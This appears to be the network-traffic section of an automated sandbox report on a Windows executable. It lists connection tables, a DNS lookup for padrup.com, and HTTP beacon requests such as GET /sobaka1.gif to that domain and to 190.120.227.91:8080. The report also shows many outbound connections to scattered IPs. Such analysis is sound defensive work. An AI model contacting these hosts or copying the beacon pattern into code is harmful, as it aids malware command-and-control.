Oct 18, 2024 09:39:37.753556013 CEST  62525        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:37.976325989 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:37.976711035 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:38.150250912 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:38.150290012 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:38.150338888 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:38.150377035 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:38.152611017 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:38.157398939 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:39.248230934 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:39.248302937 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:39.248321056 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:39.248338938 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:39.248351097 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:39.248387098 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:39.248414993 CEST  80           62526      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:39.248478889 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:39.276220083 CEST  62527        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:39.281336069 CEST  8080         62527      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:39.281423092 CEST  62527        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:39.281799078 CEST  62527        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:39.286619902 CEST  8080         62527      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:40.253004074 CEST  1338         62523      189.25.42.209    192.168.2.7
Oct 18, 2024 09:39:40.255089045 CEST  62523        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:40.255472898 CEST  62523        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:40.261025906 CEST  1338         62523      189.25.42.209    192.168.2.7
Oct 18, 2024 09:39:42.046344995 CEST  62526        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:42.049055099 CEST  62527        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:44.087147951 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:44.092153072 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:44.093470097 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:44.093604088 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:44.098472118 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.318846941 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.318934917 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:45.318953991 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.318989992 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.319010019 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:45.319067955 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.319119930 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:45.319120884 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:45.319226980 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:45.319277048 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:45.452831984 CEST  62529        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:45.457942009 CEST  8080         62529      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:45.458084106 CEST  62529        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:45.458210945 CEST  62529        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:45.463047028 CEST  8080         62529      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:53.953672886 CEST  8080         62529      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:53.953751087 CEST  62529        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:53.954643965 CEST  62529        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:53.959470987 CEST  8080         62529      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:54.238342047 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:54.238711119 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:54.243540049 CEST  80           62528      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:54.243556023 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:54.243628025 CEST  62528        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:54.243633986 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:54.243789911 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:54.248606920 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:55.329929113 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:55.330001116 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:55.330024004 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:55.330038071 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:55.330070972 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:55.330085993 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:55.330121040 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:55.383454084 CEST  62531        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:55.388550997 CEST  8080         62531      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:55.388631105 CEST  62531        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:55.388773918 CEST  62531        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:55.393743992 CEST  8080         62531      190.120.227.91   192.168.2.7
Oct 18, 2024 09:40:03.870992899 CEST  8080         62531      190.120.227.91   192.168.2.7
Oct 18, 2024 09:40:03.871176958 CEST  62531        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:40:03.871366978 CEST  62531        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:40:03.876517057 CEST  8080         62531      190.120.227.91   192.168.2.7
Oct 18, 2024 09:40:04.093595028 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:40:04.094058990 CEST  62532        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:40:04.099328041 CEST  80           62532      185.53.178.50    192.168.2.7
Oct 18, 2024 09:40:04.099342108 CEST  80           62530      185.53.178.50    192.168.2.7
Oct 18, 2024 09:40:04.099436045 CEST  62530        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:40:04.099467039 CEST  62532        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:40:04.099690914 CEST  62532        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:40:04.104513884 CEST  80           62532      185.53.178.50    192.168.2.7
Oct 18, 2024 09:40:05.184223890 CEST  80           62532      185.53.178.50    192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184310913 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184314966 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184323072 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184398890 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184398890 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184442043 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184485912 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.197354078 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202326059 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202590942 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202590942 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.207530022 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679056883 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679121971 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679286957 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.684165955 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.905960083 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.906263113 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911150932 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911232948 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911405087 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911659956 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911710978 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.916299105 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013777018 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013797045 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013926029 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.014966965 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.032229900 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037246943 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037354946 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037476063 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.042419910 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:23.536933899 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:23.537013054 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:30.135622978 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:30.135721922 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.299529076 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.313899040 CEST808062535190.120.227.91192.168.2.7

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 18, 2024 09:38:13.914680004 CEST        59786       1473  192.168.2.7      94.76.206.19
Oct 18, 2024 09:38:14.436834097 CEST        59787       5683  192.168.2.7      46.45.148.196
Oct 18, 2024 09:38:15.100198984 CEST        59788       5750  192.168.2.7      83.222.184.130
Oct 18, 2024 09:38:15.790875912 CEST        59789       5010  192.168.2.7      58.140.114.152
Oct 18, 2024 09:38:15.860819101 CEST        49974         53  192.168.2.7      1.1.1.1
Oct 18, 2024 09:38:15.949084044 CEST           53      49974  1.1.1.1          192.168.2.7
Oct 18, 2024 09:38:16.268845081 CEST        49975       4630  192.168.2.7      80.178.242.19
Oct 18, 2024 09:38:16.795880079 CEST        49976       6800  192.168.2.7      61.95.152.112
Oct 18, 2024 09:38:17.313047886 CEST        49977       7066  192.168.2.7      220.94.117.230
Oct 18, 2024 09:38:17.831371069 CEST        49978       4840  192.168.2.7      58.85.93.82
Oct 18, 2024 09:38:29.050771952 CEST        50037       4876  192.168.2.7      195.42.129.188
Oct 18, 2024 09:38:29.566015959 CEST        50038       9674  192.168.2.7      81.180.90.149
Oct 18, 2024 09:38:30.108300924 CEST        64958       8112  192.168.2.7      113.190.137.239
Oct 18, 2024 09:38:30.892754078 CEST        64959       4375  192.168.2.7      89.45.97.101
Oct 18, 2024 09:38:31.406265020 CEST        64960       4882  192.168.2.7      203.110.84.90
Oct 18, 2024 09:38:31.928888083 CEST        64961       6989  192.168.2.7      121.243.130.85
Oct 18, 2024 09:38:32.438146114 CEST        64962       6219  192.168.2.7      124.123.112.184
Oct 18, 2024 09:38:32.953200102 CEST        64963       4611  192.168.2.7      121.135.15.57
Oct 18, 2024 09:38:44.097415924 CEST        61625       5878  192.168.2.7      122.169.249.87
Oct 18, 2024 09:38:44.624254942 CEST        61626       6511  192.168.2.7      183.83.119.156
Oct 18, 2024 09:38:45.139511108 CEST        61627       6296  192.168.2.7      195.174.68.81
Oct 18, 2024 09:38:45.971062899 CEST        61628       6380  192.168.2.7      77.81.225.89
Oct 18, 2024 09:38:46.452243090 CEST        61629       5960  192.168.2.7      195.174.143.33
Oct 18, 2024 09:38:46.986623049 CEST        61630       5415  192.168.2.7      117.239.49.110
Oct 18, 2024 09:38:47.498939037 CEST        61631       5310  192.168.2.7      115.119.58.98
Oct 18, 2024 09:38:48.028748035 CEST        61632       4876  192.168.2.7      93.114.177.116
Oct 18, 2024 09:38:55.098830938 CEST           53      57084  162.159.36.2     192.168.2.7
Oct 18, 2024 09:38:55.939914942 CEST           53      56123  1.1.1.1          192.168.2.7
Oct 18, 2024 09:38:59.108103991 CEST        56335       4294  192.168.2.7      124.30.139.5
Oct 18, 2024 09:38:59.623816013 CEST        56336       5285  192.168.2.7      95.64.101.42
Oct 18, 2024 09:39:00.141468048 CEST        56337       4490  192.168.2.7      189.35.177.247
Oct 18, 2024 09:39:01.186223030 CEST        56338       4440  192.168.2.7      95.76.49.203
Oct 18, 2024 09:39:01.707211971 CEST        56339       4900  192.168.2.7      121.162.97.129
Oct 18, 2024 09:39:02.233390093 CEST        56340       5220  192.168.2.7      115.98.98.230
Oct 18, 2024 09:39:03.042238951 CEST        56341       4980  192.168.2.7      122.99.102.253
Oct 18, 2024 09:39:03.311852932 CEST        56342       7023  192.168.2.7      77.81.224.130
Oct 18, 2024 09:39:14.345959902 CEST        56343       5038  192.168.2.7      89.41.154.115
Oct 18, 2024 09:39:14.883975029 CEST        56344       5614  192.168.2.7      89.45.96.223
Oct 18, 2024 09:39:15.392713070 CEST        56345       6065  192.168.2.7      195.239.22.166
Oct 18, 2024 09:39:16.195768118 CEST        56346       6260  192.168.2.7      188.215.26.241
Oct 18, 2024 09:39:16.718312025 CEST        56347       5959  192.168.2.7      93.114.228.238
Oct 18, 2024 09:39:17.265798092 CEST        56348       5545  192.168.2.7      46.248.223.58
Oct 18, 2024 09:39:18.032288074 CEST        56349       6130  192.168.2.7      77.81.228.77
Oct 18, 2024 09:39:18.556148052 CEST        56350       5960  192.168.2.7      77.81.228.140
Oct 18, 2024 09:39:29.611979961 CEST        56351       4980  192.168.2.7      81.199.91.188
Oct 18, 2024 09:39:30.125649929 CEST        56352       6065  192.168.2.7      190.111.22.45
Oct 18, 2024 09:39:30.659199953 CEST        56353       6244  192.168.2.7      85.204.112.3
Oct 18, 2024 09:39:31.437823057 CEST        56354       5218  192.168.2.7      183.83.90.202
Oct 18, 2024 09:39:31.955214024 CEST        56355       4980  192.168.2.7      178.233.92.89
Oct 18, 2024 09:39:32.484791040 CEST        56356       5078  192.168.2.7      196.201.129.61
Oct 18, 2024 09:39:33.347023010 CEST        56357       6538  192.168.2.7      195.46.33.124
Oct 18, 2024 09:39:33.859045029 CEST        56358       5549  192.168.2.7      94.55.239.88
Oct 18, 2024 09:39:42.311460018 CEST        56359       1473  192.168.2.7      94.76.206.19
Oct 18, 2024 09:39:42.831907034 CEST        56360       5683  192.168.2.7      46.45.148.196
Oct 18, 2024 09:39:43.361831903 CEST        56361       5750  192.168.2.7      83.222.184.130
Oct 18, 2024 09:39:43.874111891 CEST        56362       5010  192.168.2.7      58.140.114.152
Oct 18, 2024 09:39:44.389770985 CEST        56363       4630  192.168.2.7      80.178.242.19
Oct 18, 2024 09:39:44.905585051 CEST        56364       6800  192.168.2.7      61.95.152.112
Oct 18, 2024 09:39:45.423873901 CEST        56365       7066  192.168.2.7      220.94.117.230
Oct 18, 2024 09:39:45.951773882 CEST        56366       4840  192.168.2.7      58.85.93.82
Oct 18, 2024 09:39:57.445199966 CEST        56367       4876  192.168.2.7      195.42.129.188
Oct 18, 2024 09:39:57.954974890 CEST        56368       9674  192.168.2.7      81.180.90.149
Oct 18, 2024 09:39:58.469192028 CEST        56369       8112  192.168.2.7      113.190.137.239
Oct 18, 2024 09:39:58.983314037 CEST        56370       4375  192.168.2.7      89.45.97.101
Oct 18, 2024 09:39:59.527113914 CEST        56371       4882  192.168.2.7      203.110.84.90
Oct 18, 2024 09:40:00.046253920 CEST        56372       6989  192.168.2.7      121.243.130.85
Oct 18, 2024 09:40:00.563608885 CEST        56373       6219  192.168.2.7      124.123.112.184
Oct 18, 2024 09:40:01.088551044 CEST        56374       4611  192.168.2.7      121.135.15.57
Oct 18, 2024 09:40:12.577378988 CEST        56375       5878  192.168.2.7      122.169.249.87
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.092669964 CEST563766511192.168.2.7183.83.119.156
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.617476940 CEST563776296192.168.2.7195.174.68.81
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:14.140265942 CEST563786380192.168.2.777.81.225.89
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:14.656397104 CEST563795960192.168.2.7195.174.143.33
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.171559095 CEST563805415192.168.2.7117.239.49.110
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.727739096 CEST563815310192.168.2.7115.119.58.98
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:16.249675035 CEST563824876192.168.2.793.114.177.116
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.389117002 CEST563834294192.168.2.7124.30.139.5
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.904402971 CEST563845285192.168.2.795.64.101.42
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:41.420604944 CEST563854490192.168.2.7189.35.177.247
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:41.935719013 CEST563864440192.168.2.795.76.49.203
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:42.451302052 CEST563874900192.168.2.7121.162.97.129
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:42.967051029 CEST563885220192.168.2.7115.98.98.230
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:43.482587099 CEST563894980192.168.2.7122.99.102.253
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:43.998183966 CEST563907023192.168.2.777.81.224.130
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:55.404717922 CEST563915038192.168.2.789.41.154.115
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:55.920231104 CEST563925614192.168.2.789.45.96.223
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:56.437864065 CEST563936065192.168.2.7195.239.22.166
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:56.951900959 CEST563946260192.168.2.7188.215.26.241
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:57.467403889 CEST563955959192.168.2.793.114.228.238
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:57.982688904 CEST563965545192.168.2.746.248.223.58
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:58.498384953 CEST563976130192.168.2.777.81.228.77
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:59.014229059 CEST563985960192.168.2.777.81.228.140
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 18, 2024 09:38:15.860819101 CEST | 192.168.2.7 | 1.1.1.1 | 0x138f | Standard query (0) | padrup.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 18, 2024 09:38:15.949084044 CEST | 1.1.1.1 | 192.168.2.7 | 0x138f | No error (0) | padrup.com | | 185.53.178.50 | A (IP address) | IN (0x0001) | false
• padrup.com
• 190.120.227.91:8080
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49731 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:15.977289915 CEST | 153 | OUT | GET /sobaka1.gif?52dc95=21721684 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:38:17.049990892 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:38:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tsOBguzEwcOLZKegK+Ua5lTOcfpc82AjaRD73K0Ua6jRrvV3+he9PgaZafioxwctAH0SEhAJKpa47YFBqSfLvw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:38:17.050107956 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzA5Ni43MDU2OjM3NGZkZjRiMTNmYTJjMTZlY2E5Y2FlYjcyMWIxYWU4MmM2ZWJlYzk2MGVjZjI0ODY5NzlhZmQ3ZTViNTk5Yzg6NjcxMjEwNjhhYzQ0ZA==';
Oct 18, 2024 09:38:17.050121069 CEST | 764 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:17.094305992 CEST | 166 | OUT | GET /sobakavolos.gif?53c2ee=32936340 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49758 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:21.514183044 CEST | 153 | OUT | GET /sobaka1.gif?a66df5=87257000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:38:22.591331959 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:38:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Yb5AHOpqssvh4KOi9zYAWLMKSpdcxTWMld9rPZzpbV90kw1PGdc1u2EJSv1/g7G43dGncLNbfNmGB8jzhXdP/w==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
